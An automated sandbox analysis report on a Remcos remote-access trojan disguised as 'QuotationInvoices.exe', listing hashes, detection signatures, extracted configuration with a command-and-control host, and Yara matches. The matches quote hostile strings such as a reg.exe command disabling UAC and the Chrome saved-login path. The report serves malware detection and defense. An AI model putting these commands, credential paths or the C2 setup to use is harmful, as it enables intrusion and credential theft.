Play interactive tour

Edit tour

Analysis Report QuotationInvoices.exe

Overview

General Information

Sample Name:	QuotationInvoices.exe
Analysis ID:	356046
MD5:	9c51e2991c6c9708d783aab030dcc0da
SHA1:	64accc9e3f84e7365d8236c580b9644427e3f9e3
SHA256:	572a6a6fa5277c2b4cc040710694d33b2def62ab74e2801893d33e92e7b105af
Tags:	exeRATRemcosRAT
Most interesting Screenshot:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to capture and log keystrokes

Contains functionality to inject code into remote processes

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara signature match

Classification

Startup

System is w10x64

QuotationInvoices.exe (PID: 7036 cmdline: 'C:\Users\user\Desktop\QuotationInvoices.exe' MD5: 9C51E2991C6C9708D783AAB030DCC0DA)

QuotationInvoices.exe (PID: 7072 cmdline: 'C:\Users\user\Desktop\QuotationInvoices.exe' MD5: 9C51E2991C6C9708D783AAB030DCC0DA)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "greatglass.servebeer.com:1961:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-I9UILL", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x5f6cc:$str_a1: C:\Windows\System32\cmd.exe 0x5f648:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f648:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f2c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e800:$str_b2: Executing file: 0x5f810:$str_b3: GetDirectListeningPort 0x5f080:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f40c:$str_b5: licence_code.txt 0x5f2a8:$str_b7: \update.vbs 0x5e870:$str_b9: Downloaded file: 0x5e83c:$str_b10: Downloading file: 0x5e824:$str_b12: Failed to upload file: 0x5f7d8:$str_b13: StartForward 0x5f7f8:$str_b14: StopForward 0x5f250:$str_b15: fso.DeleteFile " 0x5f1e4:$str_b16: On Error Resume Next 0x5f280:$str_b17: fso.DeleteFolder " 0x5e814:$str_b18: Uploaded file: 0x5e8b0:$str_b19: Unable to delete: 0x5f218:$str_b20: while fso.FileExists("
00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x5e8cc:$str_a1: C:\Windows\System32\cmd.exe 0x5e848:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e848:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5de68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e4c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5da00:$str_b2: Executing file: 0x5ea10:$str_b3: GetDirectListeningPort 0x5e280:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e60c:$str_b5: licence_code.txt 0x5e4a8:$str_b7: \update.vbs 0x5da70:$str_b9: Downloaded file: 0x5da3c:$str_b10: Downloading file: 0x5da24:$str_b12: Failed to upload file: 0x5e9d8:$str_b13: StartForward 0x5e9f8:$str_b14: StopForward 0x5e450:$str_b15: fso.DeleteFile " 0x5e3e4:$str_b16: On Error Resume Next 0x5e480:$str_b17: fso.DeleteFolder " 0x5da14:$str_b18: Uploaded file: 0x5dab0:$str_b19: Unable to delete: 0x5e418:$str_b20: while fso.FileExists("
00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp	REMCOS_RAT_variants	unknown	unknown	0x5f6cc:$str_a1: C:\Windows\System32\cmd.exe 0x5f648:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f648:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f2c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e800:$str_b2: Executing file: 0x5f810:$str_b3: GetDirectListeningPort 0x5f080:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f40c:$str_b5: licence_code.txt 0x5f2a8:$str_b7: \update.vbs 0x5e870:$str_b9: Downloaded file: 0x5e83c:$str_b10: Downloading file: 0x5e824:$str_b12: Failed to upload file: 0x5f7d8:$str_b13: StartForward 0x5f7f8:$str_b14: StopForward 0x5f250:$str_b15: fso.DeleteFile " 0x5f1e4:$str_b16: On Error Resume Next 0x5f280:$str_b17: fso.DeleteFolder " 0x5e814:$str_b18: Uploaded file: 0x5e8b0:$str_b19: Unable to delete: 0x5f218:$str_b20: while fso.FileExists("
Process Memory Space: QuotationInvoices.exe PID: 7072	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: QuotationInvoices.exe PID: 7036	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.QuotationInvoices.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
1.2.QuotationInvoices.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e8cc:$str_a1: C:\Windows\System32\cmd.exe 0x5e848:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e848:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5de68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e4c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5da00:$str_b2: Executing file: 0x5ea10:$str_b3: GetDirectListeningPort 0x5e280:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e60c:$str_b5: licence_code.txt 0x5e4a8:$str_b7: \update.vbs 0x5da70:$str_b9: Downloaded file: 0x5da3c:$str_b10: Downloading file: 0x5da24:$str_b12: Failed to upload file: 0x5e9d8:$str_b13: StartForward 0x5e9f8:$str_b14: StopForward 0x5e450:$str_b15: fso.DeleteFile " 0x5e3e4:$str_b16: On Error Resume Next 0x5e480:$str_b17: fso.DeleteFolder " 0x5da14:$str_b18: Uploaded file: 0x5dab0:$str_b19: Unable to delete: 0x5e418:$str_b20: while fso.FileExists("
1.1.QuotationInvoices.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
1.1.QuotationInvoices.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f6cc:$str_a1: C:\Windows\System32\cmd.exe 0x5f648:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f648:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f2c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e800:$str_b2: Executing file: 0x5f810:$str_b3: GetDirectListeningPort 0x5f080:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f40c:$str_b5: licence_code.txt 0x5f2a8:$str_b7: \update.vbs 0x5e870:$str_b9: Downloaded file: 0x5e83c:$str_b10: Downloading file: 0x5e824:$str_b12: Failed to upload file: 0x5f7d8:$str_b13: StartForward 0x5f7f8:$str_b14: StopForward 0x5f250:$str_b15: fso.DeleteFile " 0x5f1e4:$str_b16: On Error Resume Next 0x5f280:$str_b17: fso.DeleteFolder " 0x5e814:$str_b18: Uploaded file: 0x5e8b0:$str_b19: Unable to delete: 0x5f218:$str_b20: while fso.FileExists("
1.2.QuotationInvoices.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
1.2.QuotationInvoices.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5f6cc:$str_a1: C:\Windows\System32\cmd.exe 0x5f648:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5f648:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5ec68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5f2c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5e800:$str_b2: Executing file: 0x5f810:$str_b3: GetDirectListeningPort 0x5f080:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5f40c:$str_b5: licence_code.txt 0x5f2a8:$str_b7: \update.vbs 0x5e870:$str_b9: Downloaded file: 0x5e83c:$str_b10: Downloading file: 0x5e824:$str_b12: Failed to upload file: 0x5f7d8:$str_b13: StartForward 0x5f7f8:$str_b14: StopForward 0x5f250:$str_b15: fso.DeleteFile " 0x5f1e4:$str_b16: On Error Resume Next 0x5f280:$str_b17: fso.DeleteFolder " 0x5e814:$str_b18: Uploaded file: 0x5e8b0:$str_b19: Unable to delete: 0x5f218:$str_b20: while fso.FileExists("
0.2.QuotationInvoices.exe.2a70000.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.QuotationInvoices.exe.2a70000.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x5dacc:$str_a1: C:\Windows\System32\cmd.exe 0x5da48:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5da48:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5d068:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5d6c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5cc00:$str_b2: Executing file: 0x5dc10:$str_b3: GetDirectListeningPort 0x5d480:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5d80c:$str_b5: licence_code.txt 0x5d6a8:$str_b7: \update.vbs 0x5cc70:$str_b9: Downloaded file: 0x5cc3c:$str_b10: Downloading file: 0x5cc24:$str_b12: Failed to upload file: 0x5dbd8:$str_b13: StartForward 0x5dbf8:$str_b14: StopForward 0x5d650:$str_b15: fso.DeleteFile " 0x5d5e4:$str_b16: On Error Resume Next 0x5d680:$str_b17: fso.DeleteFolder " 0x5cc14:$str_b18: Uploaded file: 0x5ccb0:$str_b19: Unable to delete: 0x5d618:$str_b20: while fso.FileExists("
0.2.QuotationInvoices.exe.2a70000.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.QuotationInvoices.exe.2a70000.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e8cc:$str_a1: C:\Windows\System32\cmd.exe 0x5e848:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e848:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5de68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e4c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5da00:$str_b2: Executing file: 0x5ea10:$str_b3: GetDirectListeningPort 0x5e280:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e60c:$str_b5: licence_code.txt 0x5e4a8:$str_b7: \update.vbs 0x5da70:$str_b9: Downloaded file: 0x5da3c:$str_b10: Downloading file: 0x5da24:$str_b12: Failed to upload file: 0x5e9d8:$str_b13: StartForward 0x5e9f8:$str_b14: StopForward 0x5e450:$str_b15: fso.DeleteFile " 0x5e3e4:$str_b16: On Error Resume Next 0x5e480:$str_b17: fso.DeleteFolder " 0x5da14:$str_b18: Uploaded file: 0x5dab0:$str_b19: Unable to delete: 0x5e418:$str_b20: while fso.FileExists("
1.1.QuotationInvoices.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
1.1.QuotationInvoices.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x5e8cc:$str_a1: C:\Windows\System32\cmd.exe 0x5e848:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5e848:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x5de68:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x5e4c0:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x5da00:$str_b2: Executing file: 0x5ea10:$str_b3: GetDirectListeningPort 0x5e280:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x5e60c:$str_b5: licence_code.txt 0x5e4a8:$str_b7: \update.vbs 0x5da70:$str_b9: Downloaded file: 0x5da3c:$str_b10: Downloading file: 0x5da24:$str_b12: Failed to upload file: 0x5e9d8:$str_b13: StartForward 0x5e9f8:$str_b14: StopForward 0x5e450:$str_b15: fso.DeleteFile " 0x5e3e4:$str_b16: On Error Resume Next 0x5e480:$str_b17: fso.DeleteFolder " 0x5da14:$str_b18: Uploaded file: 0x5dab0:$str_b19: Unable to delete: 0x5e418:$str_b20: while fso.FileExists("
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Remcos

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\QuotationInvoices.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.QuotationInvoices.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": "greatglass.servebeer.com:1961:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-I9UILL", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7072, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7036, type: MEMORY
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: QuotationInvoices.exe

Joe Sandbox ML: detected

Cryptography:

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0042DC88 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

1_2_0042DC88

Source: QuotationInvoices.exe, 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Unpacked PE file: 1.2.QuotationInvoices.exe.400000.0.unpack

Uses 32bit PE files

Show sources

Source: QuotationInvoices.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: QuotationInvoices.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wntdll.pdbUGP source: QuotationInvoices.exe, 00000000.00000003.663166783.0000000002B70000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QuotationInvoices.exe, 00000000.00000003.663166783.0000000002B70000.00000004.00000001.sdmp

Spreading:

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004170D3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	1_2_004170D3
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004451D9 FindFirstFileExA,	1_2_004451D9
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0040A1E5 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	1_2_0040A1E5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004073C8 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_2_004073C8
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_0040782F __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_2_0040782F
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00405CDC FindFirstFileW,FindNextFileW,	1_2_00405CDC
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00414E6E FindFirstFileW,FindNextFileW,FindNextFileW,	1_2_00414E6E
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_00409FCA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	1_2_00409FCA
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004170D3 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	1_1_004170D3
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004451D9 FindFirstFileExA,	1_1_004451D9
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_0040A1E5 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	1_1_0040A1E5
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004073C8 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	1_1_004073C8

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00406496 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

1_2_00406496

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: greatglass.servebeer.com

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00411EA6 URLDownloadToFileW,ShellExecuteW,

1_2_00411EA6

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 194.5.97.248:1961

Source: Joe Sandbox View

IP Address: 194.5.97.248 194.5.97.248

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_0042190F recv,

1_2_0042190F

Source: unknown

DNS traffic detected: queries for: greatglass.servebeer.com

Source: QuotationInvoices.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: QuotationInvoices.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes

Show sources

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Esc]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Enter]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Tab]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Down]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Right]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Up]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Left]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [End]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [F2]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [F1]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Del]	1_2_00408ED1
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: [Del]	1_2_00408ED1

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004054B2

Source: C:\Users\user\Desktop\QuotationInvoices.exe

Code function: 1_2_00409900 OpenClipboard,GetClipboardData,CloseClipboard,

1_2_00409900

Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_2_004083AE GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,		1_2_004083AE
Source: C:\Users\user\Desktop\QuotationInvoices.exe	Code function: 1_1_004083AE GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,		1_1_004083AE

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919352966.0000000000487000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7072, type: MEMORY
Source: Yara match	File source: Process Memory Space: QuotationInvoices.exe PID: 7036, type: MEMORY
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QuotationInvoices.exe.2a70000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.667197281.0000000002A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.2.QuotationInvoices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 1.1.QuotationInvoices.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
